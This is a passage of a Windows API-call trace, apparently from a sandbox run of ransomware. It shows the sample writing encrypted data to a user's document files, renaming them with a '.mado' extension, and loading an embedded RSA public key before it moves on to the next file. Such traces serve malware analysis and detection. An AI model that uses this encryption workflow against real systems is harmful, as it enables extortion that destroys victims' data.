(HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.165] GetCurrentThreadId () returned 0x600 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68288 [0204.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68390 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe118 [0204.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0d0 [0204.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0b8 [0204.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe130 [0204.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe148 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0d0 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0d0 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe118 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bdb0 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bec8 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0d0 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68498 [0204.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68288 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68498 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0b8 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68180 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0a0 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e678 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68390 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.168] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0x14e10, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0x14e10, lpOverlapped=0x0) returned 1 [0204.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0204.169] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14e15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.169] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff260 | out: hHeap=0x2c0000) returned 1 [0204.169] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.169] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.169] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.169] CloseHandle (hObject=0x63c) returned 1 [0204.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0204.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74b68 [0204.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0204.171] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vcu-S1_L5cVixC1jBX9Z.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vcu-s1_l5cvixc1jbx9z.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vcu-S1_L5cVixC1jBX9Z.pptx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vcu-s1_l5cvixc1jbx9z.pptx.mado")) returned 1 [0204.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.171] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.172] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a45a90, ftCreationTime.dwHighDateTime=0x1d5a6b3, ftLastAccessTime.dwLowDateTime=0x454a9050, ftLastAccessTime.dwHighDateTime=0x1d5d542, ftLastWriteTime.dwLowDateTime=0x454a9050, ftLastWriteTime.dwHighDateTime=0x1d5d542, nFileSizeHigh=0x0, nFileSizeLow=0x12f05, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w3umcQyTn4DRJs88m7.xlsx", cAlternateFileName="W3UMCQ~1.XLS")) returned 1 [0204.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff260 | out: hHeap=0x2c0000) returned 1 [0204.173] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\w3umcQyTn4DRJs88m7.xlsx") returned=".xlsx" [0204.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\w3umcQyTn4DRJs88m7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\w3umcqytn4drjs88m7.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.173] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=77573) returned 1 [0204.173] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.175] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12edf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.175] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.177] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.177] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x12f05, lpOverlapped=0x0) returned 1 [0204.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.178] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.179] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.179] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.179] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.179] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.179] GetLastError () returned 0x0 [0204.179] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.179] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.179] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.179] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.179] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12f10) returned 0x3b80690 [0204.179] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e678 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0a0 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e6c0 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0b8 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe130 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0204.180] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe130 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe100 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe0e8 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bc98 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bdb0 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: 